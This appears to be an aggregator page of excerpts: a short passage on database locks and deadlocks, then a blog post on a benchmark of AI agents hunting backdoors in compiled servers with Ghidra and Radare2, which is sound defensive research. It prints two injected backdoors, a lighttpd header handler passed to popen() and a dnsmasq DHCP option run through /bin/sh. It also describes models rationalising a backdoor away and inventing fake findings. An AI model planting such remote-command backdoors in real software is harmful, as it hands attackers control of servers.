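SELECT * FROM users WHERE id = 4 FOR SHARE;   -- shared (S) lock: others may still read
SELECT * FROM users WHERE id = 4 FOR UPDATE;  -- exclusive (X) lock: others must wait
COMMIT;  -- both locks are released here
```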
In SERIALIZABLE mode, all transactions must always obtain X locks when updating a row. Most of the time this works fine, aside from the performance overhead of locking. But when two transactions each hold a lock that the other needs, neither can proceed: deadlock!
MySQL can detect deadlock and will kill one of the involved transactions to allow the other to make progress.
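A minimal deadlock sketch, reusing the users table from earlier. Each transaction locks one row and then waits for the other’s, forming a cycle; InnoDB notices the cycle and rolls back one of the two so the other can proceed.

```sql
-- Transaction 1
BEGIN;
UPDATE users SET name = 'a' WHERE id = 1;  -- T1 locks row 1

-- Transaction 2
BEGIN;
UPDATE users SET name = 'b' WHERE id = 2;  -- T2 locks row 2
UPDATE users SET name = 'b' WHERE id = 1;  -- T2 blocks, waiting for T1

-- Transaction 1
UPDATE users SET name = 'a' WHERE id = 2;  -- T1 waits for T2: a cycle, so deadlock
```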
Postgres handles write conflicts in SERIALIZABLE mode with less locking, and avoids the deadlock issue completely.
As transactions read and write rows, Postgres creates predicate locks, which are “locks” on sets of rows specified by a predicate. For example, if a transaction updates all rows with IDs 10–20, it will take a lock on the predicate WHERE id BETWEEN 10 AND 20. These locks are not used to block access to rows, but rather to track which rows are being used by which transactions, and then detect data conflicts on-the-fly.
Combined with multi-row versioning, this lets Postgres use optimistic conflict resolution. It never blocks transactions while waiting to acquire a lock, but it will kill a transaction if it detects that it’s violating the SERIALIZABLE guarantees.
Let’s look at a timeline similar to the MySQL example, but this time following Postgres’ optimistic technique.
The difference looks subtle, but it is implemented in quite different ways. Both Postgres and MySQL resolve the conflict by killing one transaction in order to maintain SERIALIZABLE guarantees. Applications must account for this outcome and include retry logic for important transactions.
Transactions are just one tiny corner of all the amazing engineering that goes into databases, and we only scratched the surface! But a fundamental understanding of what they are, how they work, and the guarantees of the four isolation levels is helpful for working with databases more effectively.
What esoteric corner of database management systems would you like to see us cover next? Join our Discord community and let us know.
...
Read the original on planetscale.com »
We hid backdoors in ~40MB binaries and asked AI + Ghidra to find them
Claude can code, but can it check binary executables?
Now on the front page of Hacker News — see the discussion.
We already did our experiments with using NSA software to hack a classic Atari game. This time we want to focus on a much more practical task — using AI agents for malware detection. We partnered with Michał “Redford” Kowalczyk, reverse engineering expert from Dragon Sector, known for finding malicious code in Polish trains, to create a benchmark of finding backdoors in binary executables, without access to source code.
We were surprised that today’s AI agents can detect some hidden backdoors in binaries. We hadn’t expected them to possess such specialized reverse engineering capabilities.
However, this approach is not ready for production. Even the best model, Claude Opus 4.6, found relatively obvious backdoors in small/mid-size binaries only 49% of the time. Worse yet, most models had a high false positive rate — flagging clean binaries.
In this blog post we discuss a few recent security stories, explain what binary analysis is, and how we construct a benchmark for AI agents. We will see when they accomplish tasks and when they fail — by missing malicious code or by reporting false findings.
Just a few months ago Shai Hulud 2.0 compromised thousands of organizations, including Fortune 500 companies, banks, governments, and cool startups — see postmortem by PostHog. It was a supply chain attack for the Node Package Manager ecosystem, injecting malicious code stealing credentials.
Just a few days ago, Notepad++ shared updates on a hijack by state-sponsored actors, who replaced legitimate binaries with infected ones.
Even the physical world is at stake, including critical infrastructure. For example, researchers found hidden radios in Chinese solar power inverters and security loopholes in electric buses. Every digital device has firmware, which is much harder to check than the software we install on a computer — and has much more direct impact. Both state and corporate actors have incentives to tamper with it.
You do not even need bad actors. Network routers often have hidden admin passwords baked into their firmware so the vendor can troubleshoot remotely — but anyone who discovers those passwords gets the same access.
Can we use AI agents to protect against such attacks?
In day-to-day programming, we work with source code. It relies on high-level abstractions: classes, functions, types, organized into a clear file structure. LLMs excel here because they are trained on this human-readable logic.
Compilation translates high-level languages (like Go or Rust) into low-level machine code for a given CPU architecture (such as x86 or ARM). We get raw CPU instructions: moving data between registers, adding numbers, or jumping to memory addresses. The original code structure, together with variable and function names, gets lost.
To make matters worse, compilers aggressively optimize for speed, not readability. They inline functions (changing the call hierarchy), unroll loops (replacing concise logic with repetitive blocks), and reorder instructions to keep the processor busy.
Yet, a binary is what users actually run. And for closed-source and binary-distributed software, it is all we have.
Analyzing binaries is a long and tedious process of reverse engineering, which starts with a chain of translations: machine code → assembly → pseudo-C. Let’s see how an example backdoor looks in those representations:
Going from raw bytes to assembly is straightforward, as it can be viewed with a command-line tool like objdump.
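For instance, a quick sketch using objdump from binutils, here disassembling /bin/ls as a stand-in for the target binary:

```shell
# Disassemble the executable sections into assembly
objdump -d /bin/ls | head -n 20
```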
Turning assembly into C is much harder — we need reverse engineering tools, such as open-source Ghidra (created by NSA) and Radare2, or commercial ones like IDA Pro and Binary Ninja.
The decompilers try their best at making sense of the CPU instructions and generating a readable C code. But since all those high-level abstractions and variable names got lost during compilation, the output is far from perfect. You see output full of FUN_00130550, bVar49, local_148 — names that mean nothing.
We ask AI agents to analyze binaries and determine if they contain backdoors or malicious modifications.
We started with several open-source projects: lighttpd (a C web server), dnsmasq (a C DNS/DHCP server), Dropbear (a C SSH server), and Sozu (a Rust load balancer). Then, we manually injected backdoors. For example, we hid a mechanism for an attacker to execute commands via an undocumented HTTP header.
Important caveat: All backdoors in this benchmark are artificially injected for testing. We do not claim these projects have real vulnerabilities; they are legitimate open-source software that we modified in controlled ways.
These backdoors weren’t particularly sophisticated — we didn’t try to heavily obfuscate them or hide them in obscure parts of the code. They are the kind of anomaly a skilled human reverse engineer could spot relatively easily.
The agents are given a compiled executable — without source code or debug symbols. They have access to reverse engineering tools: Ghidra, Radare2, and binutils. The task is to identify malicious code and pinpoint the start address of the function containing the backdoor (e.g., 0x4a1c30). See dnsmasq-backdoor-detect-printf/instruction.md for a typical instruction.
A few tasks use a different methodology: we present three binaries and ask which ones contain backdoors, without asking for the specific location — see e.g. sozu-backdoor-multiple-binaries-detect/instruction.md. We expected this to be a simpler task (it wasn’t). This approach simulates supply chain attacks, where often only a subset of binaries are altered.
We injected a backdoor into the lighttpd server that executes shell commands from an undocumented HTTP header.
Here’s the core of the injected backdoor — it looks for a hidden X-Forwarded-Debug header, executes its contents as a shell command via popen(), and returns the output in a response header:
gboolean li_check_debug_header(liConnection *con) {
    liRequest *req = &con->mainvr->request;
    GList *l;
    l = li_http_header_find_first(req->headers, CONST_STR_LEN("X-Forwarded-Debug"));
    if (NULL != l) {
        liHttpHeader *hh = (liHttpHeader*) l->data;
        char *debugIn = LI_HEADER_VALUE(hh);
        FILE *fp = popen(debugIn, "r"); // Execute attacker's command
        // … read output into debugOut …
        pclose(fp);
        li_http_header_insert(con->mainvr->response.headers,
            CONST_STR_LEN("X-Request-Trace"), debugOut, strlen(debugOut));
        return TRUE;
    }
    return FALSE;
}
For a user who downloaded this backdoored server, it would seem like this is a legitimate program. However, an attacker could trivially execute any command by sending a specially crafted packet.
Here’s how Claude did it:
Step 1. The model identified the binary and its 26 shared libraries — one of which contained the backdoor.
Step 2. Next, it ran strings with grep patterns looking for obvious indicators of a backdoor:
strings bin/lighttpd2-worker | grep -iE '(shell|bash|/bin/sh|exec|system|backdoor)'
However, the command didn’t find anything suspicious. The model expanded the search to all shared libraries, looking for more patterns (hardcoded IPs, suspicious commands, and credential patterns). Still nothing obvious.
Step 3. Claude switched strategies and used nm -D to list imported functions:
for f in lib/*.so; do
  nm -D "$f" | grep -E ' U (system|exec|popen)'
done
lib/liblighttpd2-shared-2.0.0.so: U popen@GLIBC_2.2.5
Claude detected that one of the libraries the server uses imports popen(), a function used to execute shell commands. This immediately alarmed the model.
Step 4. Claude investigated further to determine if the function was truly malicious, using the Radare2 decompiler for analysis.
It first identified which function calls popen():
r2 -q -c 'aaa; axt @ sym.imp.popen' lib/liblighttpd2-shared-2.0.0.so
The output of this command revealed that a function called li_check_debug_header performs shell execution. (That’s the backdoor we added!) The model smelled something fishy.
Then using Radare2’s decompiler, the model examined the function:
r2 -q -c 'aaa; s dbg.li_check_debug_header; pdc' lib/liblighttpd2-shared-2.0.0.so
The decompiled pseudocode allowed the LLM to understand how the backdoor works — it looks for an undocumented HTTP header X-Forwarded-Debug and if it’s present executes an attacker-provided command. The server conveniently sends the command output back in a X-Request-Trace response header.
Step 5. Finally, Claude used Radare2 to confirm the function wasn’t dead code, checking cross-references to ensure it was called from the main program:
r2 -q -c 'aaa; s 0x00015260; pd 10' lib/liblighttpd2-shared-2.0.0.so
Now being confident that it found a real backdoor, Claude reported those findings back and finished the exploration.
However, LLMs very often miss even obvious backdoors.
We took dnsmasq — a widely-used DNS/DHCP server — and added an embarrassingly obvious backdoor. We weren’t even trying to hide it: if DHCP option 224 (undocumented, we made it up) is present in a packet, execute its contents as a shell command via execl("/bin/sh", "sh", "-c", buf, NULL).
The backdoor we added was just 7 lines of C in DHCP packet parsing:
/* existing DHCP option handling */
match_vendor_opts(opt, daemon->dhcp_opts);
+ if (opt = option_find(mess, sz, 224, 1)) {
+   char buf[256];
+   int len = option_len(opt);
+   memcpy(buf, option_ptr(opt, 0), len);
+   buf[len] = '\0';
+   execl("/bin/sh", "sh", "-c", buf, NULL);
+ }
Even the best model in our benchmark got fooled by this task. Claude Opus 4.6 found /bin/sh in the strings output early on, traced it to the exact function containing the backdoor, and saw the execl("/bin/sh", "sh", "-c", …) call. Then it simply assumed it was normal.
It examined the function, but concluded it was harmless.
The model found the exact function, saw the exact execl call with /bin/sh -c — and rationalized it away as “legitimate DHCP script execution.” It never checked where the command string actually comes from (a DHCP packet from client). It then moved on to investigate other functions and never circled back.
The executables in our benchmark often have hundreds or thousands of functions — while the backdoors are tiny, often just a dozen lines buried deep within. Finding them requires strategic thinking: identifying critical paths like network parsers or user input handlers and ignoring the noise.
Current LLMs lack this high-level intuition. Instead of prioritizing high-risk areas, they often decompile random functions or grep for obvious keywords like system() or exec(). When simple heuristics fail, models frequently hallucinate or give up entirely.
This lack of focus leads them down rabbit holes. We observed agents fixating on legitimate libraries — treating them as suspicious anomalies. They wasted their entire context window auditing benign code while the actual backdoor remained untouched in a completely different part of the binary.
The security community is drowning in AI-generated noise. The curl project recently stopped paying for bug reports partly because of AI slop:
The vast majority of AI-generated error reports submitted to cURL are pure nonsense.
A security tool that gives you fake reports is useless and frustrating to use. We specifically tested for this with negative tasks — clean binaries with no backdoor. We found that 28% of the time, models reported backdoors or issues that weren’t real. For any practical malware detection software, we would expect a false positive rate below 0.001%, since most software is safe (see the false positive paradox).
For example, Gemini 3 Pro supposedly “discovered” a backdoor in… command-line argument parsing in one of the servers.
In reality, the source code correctly validates and parses the command-line argument as a number. It never attempts to execute it. Several “findings” that the model reported are completely fake and missing from the source code.
We restricted agents to open-source tools: Ghidra and Radare2. We verified that frontier models (including Claude Opus 4.6 and Gemini 3 Pro) achieve a 100% success rate at operating them — correctly loading binaries and running basic commands.
However, these open-source decompilers lag behind commercial alternatives like IDA Pro. While they handle C binaries well, they have issues with Rust (though agents managed to solve some tasks), and fail completely with Go executables.
For example, we tried to work with Caddy, a web server written in Go, with a binary weighing 50MB. Radare2 loaded it in 6 minutes but produced poor-quality code, while Ghidra not only took 40 minutes just to load, but also failed to return correct data. Meanwhile, IDA Pro loaded it in 5 minutes and gave correct, usable code, sufficient for manual analysis.
To ensure we measure agent intelligence rather than tool quality, we excluded Go binaries and focused mostly on C executables (and one Rust project) where the tooling is reliable.
Can AI find backdoors in binaries? Sometimes. Claude Opus 4.6 solved 49% of tasks, while Gemini 3 Pro solved 44% and Claude Opus 4.5 solved 37%.
As of now, it is far from being useful in practice — we would need a much higher detection rate and a much lower false positive rate to make it a viable end-to-end solution.
It works on small binaries and when it sees unexpected patterns. At the same time, it struggles with larger files or when backdoors mimic legitimate access routes.
While end-to-end malware detection is not reliable yet, AI can make it easier for developers to perform initial security audits. A developer without reverse engineering experience can now get a first-pass analysis of a suspicious binary.
A year ago, models couldn’t reliably operate Ghidra. Now they can perform genuine reverse engineering — loading binaries, navigating decompiled code, tracing data flow.
The whole field of working with binaries becomes accessible to a much wider range of software engineers. It opens opportunities not only in security, but also in performing low-level optimization, debugging and reverse engineering hardware, and porting code between architectures.
We believe that results can be further improved with context engineering (including proper skills or MCP) and access to commercial reverse engineering software (such as the mentioned IDA Pro and Binary Ninja).
Once AI demonstrates the capability to solve some tasks (as it does now), subsequent models usually improve drastically.
Moreover, we expect that a lot of analysis will be performed with local models, likely fine-tuned for malware detection. Security-sensitive organizations can’t upload proprietary binaries to cloud services. Additionally, bad actors will optimize their malware to evade public models, necessitating the use of private, local models for effective defense.
You can check full results and see the tasks at QuesmaOrg/BinaryAudit.
...
Read the original on quesma.com »
...
Read the original on www.lesswrong.com »